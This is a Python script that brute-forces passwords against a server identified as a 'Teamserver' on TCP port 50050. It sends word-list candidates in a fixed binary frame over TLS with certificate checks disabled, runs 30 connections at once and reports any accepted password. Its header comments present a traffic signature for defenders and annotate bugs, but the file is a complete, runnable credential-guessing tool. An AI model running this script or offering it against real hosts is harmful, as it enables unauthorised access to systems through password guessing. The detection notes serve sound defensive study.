"""Submit each candidate password from a word list (or stdin) to a host on
TCP port 50050 over TLS and report any candidate the server accepts.

Defender notes, all derived from the code in this file:
  * every candidate is sent on its own fresh TCP + TLS connection to port
    50050, with up to 30 connections in flight at once (see the
    ThreadPoolExecutor at the bottom);
  * each connection carries exactly one 261-byte message: the 4-byte header
    00 00 be ef, a 1-byte length, and the candidate right-padded with "A" to
    256 bytes; the reply is compared against the 4 bytes 00 00 ca fe.
A burst of short-lived TLS sessions of that shape from a single source is the
observable signature of this script on the listening side.
"""

import time,socket,ssl,argparse,concurrent.futures,sys   # `time` is never used below

MIN_PYTHON = (3, 3)
if sys.version_info < MIN_PYTHON:
    # Hard stop before anything else runs; int.to_bytes() (used in
    # passwordcheck) and the other calls below are all available from 3.3.
    sys.exit("Python %s.%s or later is required.\n" % MIN_PYTHON)

parser = argparse.ArgumentParser()

parser.add_argument("host",
                    help="Teamserver address")
parser.add_argument("wordlist", nargs="?",
                    help="Newline-delimited word list file")

# Parsed at import time: importing this module consumes sys.argv and may
# call sys.exit() on bad arguments.
args = parser.parse_args()

class NotConnectedException(Exception):
    """Raised by Connector.send()/receive() when no TLS socket is open.

    `node` is accepted for symmetry with DisconnectedException; no caller in
    this file passes it.
    """
    def __init__(self, message=None, node=None):
        self.message = message
        self.node = node

class DisconnectedException(Exception):
    """Companion to NotConnectedException; nothing in this file raises it."""
    def __init__(self, message=None, node=None):
        self.message = message
        self.node = node

class Connector:
    """Thin wrapper around a single client-side TLS connection.

    Certificate verification is disabled (CERT_NONE) and no server hostname
    is given to wrap_socket(), so the peer is never authenticated: whatever
    is listening on the port is accepted.
    """
    def __init__(self):
        self.sock = None       # plain TCP socket, created in open()
        self.ssl_sock = None   # TLS wrapper around self.sock, created in open()
        # SSLContext() with no protocol argument: which protocol/version range
        # that selects depends on the interpreter version — TODO confirm on
        # the Python in use.
        self.ctx = ssl.SSLContext()
        self.ctx.verify_mode = ssl.CERT_NONE
        pass

    def is_connected(self):
        # Returns a truthy/falsy value (the SSLSocket or None), not a bool.
        return self.sock and self.ssl_sock

    def open(self, hostname: str, port: int) -> None:
        """Connect to (hostname, port) with a 10 s socket timeout, then wrap in TLS.

        The 10 s timeout applies to connect, send and recv on this socket.
        """
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.sock.settimeout(10)
        self.ssl_sock = self.ctx.wrap_socket(self.sock)

        # When the target is this machine's own hostname, connect to the first
        # address gethostbyname_ex() reports instead of the bare name.
        if hostname == socket.gethostname():
            ipaddress = socket.gethostbyname_ex(hostname)[2][0]
            self.ssl_sock.connect((ipaddress, port))
        else:
            self.ssl_sock.connect((hostname, port))

    def close(self) -> None:
        """Close the plain socket and drop both references.

        NOTE(review): in CPython, wrap_socket() detaches the file descriptor
        from the original socket, so self.sock.close() here is likely a no-op
        and the descriptor is released only when ssl_sock is collected —
        confirm before relying on prompt closure.
        """
        if self.sock:
            self.sock.close()
            self.sock = None
            self.ssl_sock = None

    def send(self, buffer: bytes) -> None:
        """Write all of `buffer` to the TLS socket; raises NotConnectedException if none is open."""
        if not self.ssl_sock: raise NotConnectedException("Not connected (SSL Socket is null)")
        self.ssl_sock.sendall(buffer)

    def receive(self) -> bytes:
        """Read until at least 4 bytes have been accumulated and return them.

        recv() is called with no size, so each read takes whatever has arrived
        (up to the default buffer size); the returned value can therefore be
        longer than 4 bytes. The counter only advances on non-empty reads.
        """
        if not self.ssl_sock: raise NotConnectedException("Not connected (SSL Socket is null)")
        received_size = 0
        data_buffer = b""

        while received_size < 4:
            data_in = self.ssl_sock.recv()
            data_buffer = data_buffer + data_in
            received_size += len(data_in)

        return data_buffer

def passwordcheck(password):
    """Submit one candidate and return it if the server replies 00 00 ca fe.

    Returns False on any other reply and None (after printing a warning) for
    the empty string. Each call opens, uses and closes its own Connector to
    args.host:50050. Exceptions propagate to the caller's `except` block:
    UnicodeEncodeError for non-ASCII input, OverflowError from
    to_bytes(1, signed=True) for candidates longer than 127 bytes, and any
    socket/TLS error.
    """
    if len(password) > 0:
        result = None
        conn = Connector()
        conn.open(args.host, 50050)
        # Wire format: 4-byte header, 1-byte length, candidate padded with
        # "A" to 256 bytes (ljust never truncates, but the length byte above
        # already limits usable candidates to 127 bytes).
        payload = bytearray(b"\x00\x00\xbe\xef") + len(password).to_bytes(1, "big", signed=True) + bytes(bytes(password, "ascii").ljust(256, b"A"))
        conn.send(payload)
        if conn.is_connected(): result = conn.receive()
        if conn.is_connected(): conn.close()
        # Exact 4-byte comparison: a longer reply from receive() does not match.
        if result == bytearray(b"\x00\x00\xca\xfe"): return password
        else: return False
    else: print("Do not have a blank password!!!")

passwords = []

# The word list file is never explicitly closed and is read with the locale
# default encoding; a trailing newline produces a final "" entry, which
# passwordcheck reports as a blank password. stdin lines are stripped of
# trailing whitespace instead.
if args.wordlist: passwords = open(args.wordlist).read().split("\n")
else:
    for line in sys.stdin: passwords.append(line.rstrip())

if len(passwords) > 0:
    # `attempts` and `failures` are counted but never reported.
    attempts = 0
    failures = 0

    # Up to 30 candidates are checked concurrently, each on its own connection.
    with concurrent.futures.ThreadPoolExecutor(max_workers=30) as executor:

        future_to_check = {executor.submit(passwordcheck, password): password for password in passwords}
        for future in concurrent.futures.as_completed(future_to_check):
            password = future_to_check[future]
            try:
                data = future.result()
                attempts = attempts + 1
                # Any truthy result (the accepted candidate) is a hit.
                if data:
                    print ("Successful Attack!!!")
                    print("Target Password: {}".format(password))
            except Exception as exc:
                # Covers connection/TLS failures as well as the encoding and
                # length errors raised inside passwordcheck.
                failures = failures + 1
                print('%r generated an exception: %s' % (password, exc))

else:
    print("Password(s) required")